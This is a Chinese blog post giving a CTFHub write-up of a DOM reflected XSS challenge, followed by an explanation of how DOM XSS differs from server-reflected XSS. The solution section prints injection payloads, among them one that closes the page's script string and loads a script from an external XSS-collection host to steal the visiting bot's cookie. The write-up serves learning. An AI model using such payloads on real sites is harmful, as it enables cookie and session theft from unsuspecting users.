CTFHub | DOM反射

已于 2024-02-01 07:34:29 修改
阅读量701 收藏 11
点赞数 6
分类专栏: CTF精进之路 文章标签: 安全 web安全
于 2024-01-31 17:50:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/135951879
版权

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

DOM反射:

        (无)

网页显示内容

        

        

0x02 解题过程

查看网页内容发现一个输入框和一个提交表单。第二个输入框用于模拟用户点击访问目标网页的一个过程。

        

尝试使用 scripts 标签写入一个警告弹窗,警告内容自定义。

<script>alert("flag")</script>

        

点击提交表单按钮,发现这里并未弹出警告弹窗。当然,不正常加载的原因有很多,可能是因为浏览器阻止、 HTML 的惰性加载、代码执行了过滤或转义处理等。

        

检查网页源代码,在 JS 部分,目标网页通过使用 $("#text")[0].innerHTML 获取为 text 元素的 ID ,并将内容设置为 CTFHub is very niubility 

<div>
    <h1>Hello, CTFHub
    </h1>
    <p id="text"></p>
    <script>
        $("#text")[0].innerHTML = 'CTFHub is very niubility';
    </script>
</div>

innerHTML属性:

 innerHTML 属性设置或返回元素的 HTML 内容(内部 HTML)。

        

通过 innerHTML 属性的特性,构造一个闭合语句,再次尝试弹出警告弹窗。需要注意的是,部分浏览器会阻止此操作,不会正常弹出警告弹窗。设置一下浏览器权限即可。

'</script><script>alert("flag")</script>

        

尝试构造闭合语句,将编写好的注入代码写入到目标网页中,点击提交。注意,这里同样可以在后面加一个警告弹窗或其他语句,所有的语句都会被执行。

'></script><script src=http://XXX.XXX.XXX.XXX/Q7yYOv?1706736090></script>'><script>alert("注入成功!")</script>

        

通过第二个输入框模拟用户执行后,访问 XSS 平台查看,在 cookie 中发现此题 flag 。

        

        

0x03 DOM反射

         DOM 反射型 XSS 与其他类型 XSS 的区别在于攻击方式不同。在触发 DOM 反射型漏洞时,攻击者不需要与服务器进行交互。通常情况下,攻击者利用用户输入的数据,并通过网页中的 JavaScript 进行处理和渲染,从而实现攻击目的。

        

DOM 反射型与常见 XSS 注入演示图

        通过演示图我们可以看到,常见的 XSS 注入过程是攻击者先向目标网页注入恶意脚本,然后目标网页会向服务器提交这个非法请求,当服务器处理完成这个请求后会向网页返回恶意脚本,也就是注入成功 XSS 脚本。这时,用户访问目标网页就会执行攻击者注入的恶意脚本。

        而 DOM 反射型则不同,当攻击者向目标网页注入恶意脚本时,并不会提交给服务器。用户访问目标网页就会直接执行攻击者注入的恶意脚本。

        

        

0x04 参考文献

[1].w3school. HTML DOM Element innerHTML 属性[EB/OL]. [2024-02-01]. https://www.w3school.com.cn/jsref/prop_html_innerhtml.asp.

       

        

0x05 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
专栏目录
反射型xss攻击流量数据包
07-18
反射型xss攻击流量数据包
CTFHub XSS DOM反射 WriteUp
柠檬i的博客
07-04 2359
查看前端代码,构造语句闭合标签,以此完成xss攻击
CTFHUB-WEB-XSS-反射
weixin_43486981的博客
08-13 4243
CTFHUB-WEB-XSS-反射型知识点:跨站脚本攻击XSS题目XSS platform平台 知识点:跨站脚本攻击XSS XSS允许恶意web用户将代码植入到提供给其它用户使用的页面中。 特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话 类型: DOM型。属于反射型的一种,利用非法输入来闭合对应的html标签。数据流向是URL→浏览器。 存储型。危害大。相关源代码存放于服务器,用户浏览该页面时触发代码执行。 反射型。需要攻击者提前构造一个恶意链接来诱使客户点击。 防
CTFHUB-WEB-XSS-DOM反射
weixin_49539962的博客
08-08 370
但是在输入xss代码是要注意,我们可控的是“CTFHUB is very niubility”这句话,需要把这句话闭合后插入xss代码才能生效。和反射型是一样的,使用xss platform。
CTFHUB——反射型XSS详解
wuuconix's blog
09-01 8032
背景 本来看ctfhub上有xss的题目,打算好好学习一波,结果点开一看,只有一道题2333。 便现在dvwa上熟悉了一波。所谓反射型是相对于存储型来讲的。 如果黑客的xss注入是通过某种方式储存到了数据库中,那就是存储型的,这种xss的特点就是每次访问该页面都会收到xss攻击,因为js语句已经放在数据库里了。 而反射型xss则不是这样,每次触发只能手动输入和点击才能触发。 我认为xss产生的原因主要是对便签审查不严格造成的。 dvwa xss例题 下面写一下dvwa中的三种难度的反射型xss。 <?
CTFHub | 反射
尼泊罗河伯的博客
12-16 544
检查网页显示内容发现有一个输入框以及一个提交表单。可以在这个输入框中输入你的名字并提交。第二个输入框是发送构造好的 XSS 链接给机器人模拟执行。一般情况下,在一个网页中有一个输入框并且带有一个提交表单的,就有可能含有 XSS 漏洞。
dom4j+反射机制
03-05
**DOM4J与反射机制详解** 在Java编程中,DOM4J和反射机制是两个非常重要的概念,它们分别用于处理XML文档和动态访问类的方法、属性。DOM4J是一个强大的Java XML API,提供了灵活的XML解析和操作能力,而反射机制则...
自定义的IOC容器,dom4j进行解析,反射创建对象
02-07
使用dom4j解析spring配置文件,通过反射创建对象并存放到临时空间中。通过getBean获取对象
java使用dom4j解析xml配置文件实现抽象工厂反射示例
09-04
在本示例中,DOM4J被用来读取XML配置文件,实现一个抽象工厂模式和反射机制的结合。这种方式使得代码更具灵活性和可扩展性,因为配置信息可以在运行时动态加载,而不需要对代码进行硬编码。 首先,我们来看配置文件...
dom4j解析xml,利用反射机制
08-28
在这个项目中,我们利用DOM4J来解析XML文件,并通过Java的反射机制将解析出的信息存储到特定的类中。 首先,我们需要了解XML的基本概念。XML(Extensible Markup Language)是一种标记语言,常用于数据交换和结构化...
xss跨站攻击脚本概述
xu_1234567的博客
10-28 354
1.XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 xss攻击分为三类: (1)持久型跨站(存储型xss ):最直接的危害类型,跨站代码存储在服务器(数据库) (2)非持久型跨站(反射型xss):反射型跨站脚本漏洞,最普
CTFHub | web—XSS(反射型)
2301_76435948的博客
09-27 507
XSS反射型:URL地址当中的恶意参数直接被输出到页面中,导致攻击代码被触发。
新人必看!关于dom型xss和反射型xss的区别
qq_44005305的博客
02-20 942
xss漏洞的原理其实很简单,类型也分为三类,反射型、储存型和dom型。但是刚接触xss的时候我根本不理解什么是dom型xss,无法区分反射型和dom型,也很少遇见,现在通过这篇文章可以给新入坑的小白更好的理解xss漏洞,也通过这篇文章巩固一下我对xss的理解,如有不正确的地方欢迎各位师傅斧正。
CTFHub技能树web之XSS
wzhwzh123321的博客
02-26 1994
在XSS系列的题目中,由于需要使用能够接受XSS数据的平台,并且由于使用的是CTFHub的模拟机器人点击我们的虚假URL,因此使用的XSS平台不能是自己本地搭建的,如果是本地的模拟点击的机器人将无法访问我们给的这个URL地址,也就无法接收到我们想要的数据了,因此想解决本系列的题目,可以通过在线XSS平台或者自己使用服务器搭建一个XSS平台。可以看到可控的位置在53-55行中的这个位置,先闭合前面的单引号和<script>,然后再用一个<script>输入XSS代码,构造语句如下';第三题: DOM反射
CTFHUB—XSS—DOM反射
最新发布
weixin_68416970的博客
08-05 352
CTFHUB技能树,XSS漏洞,DOM反射的过关教程!超详细!包看包会!
CTFHub-Web-反射型XSS
qq_54037445的博客
11-28 613
CTFHub-Web-反射型XSS XSS平台
[ctfhub]-xss详解
weixin_52116519的博客
04-28 5154
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射型XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
题解记录-CTFHub技能树|Web|XSS,文件上传
weixin_57448435的博客
09-15 1041
xss平台使用,修改后缀名、文件头、双写绕过,%00截断,.htaccess文件理解,bp与蚁剑工具的使用
ctfhub DOM型xss
07-28
CTFHub 是一个知名的 CTF 平台,DOM 型 XSS 是其中的一种常见的漏洞类型。DOM(Document Object Model)型 XSS 漏洞是指攻击者通过修改网页的 DOM 结构,注入恶意的脚本代码,并在用户浏览器中执行,从而实现攻击目标的攻击方式。 要进行 DOM 型 XSS 攻击,攻击者通常会利用网站前端的 JavaScript 代码中存在的漏洞,通过修改 DOM 树结构来注入恶意脚本。这些脚本可以窃取用户的敏感信息、劫持用户会话、篡改页面内容等。 防御 DOM 型 XSS 攻击的方法主要包括以下几点: 1. 输入过滤和验证:对用户输入的数据进行过滤和验证,确保只允许合法的数据进入系统。 2. 输出编码:将输出到页面的数据进行适当的编码,防止恶意脚本被执行。 3. 使用安全的 API:避免使用不安全DOM 操作函数,例如 innerHTML、eval 等。 4. Content Security Policy(CSP):设置合适的 CSP 策略,限制页面中可执行的脚本来源。 5. 使用浏览器提供的防护机制:现代浏览器已经提供了一些内置的防护机制,如跨站脚本保护(XSS Auditor)等。 希望这些信息对你有帮助,如果你有其他问题,请继续提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值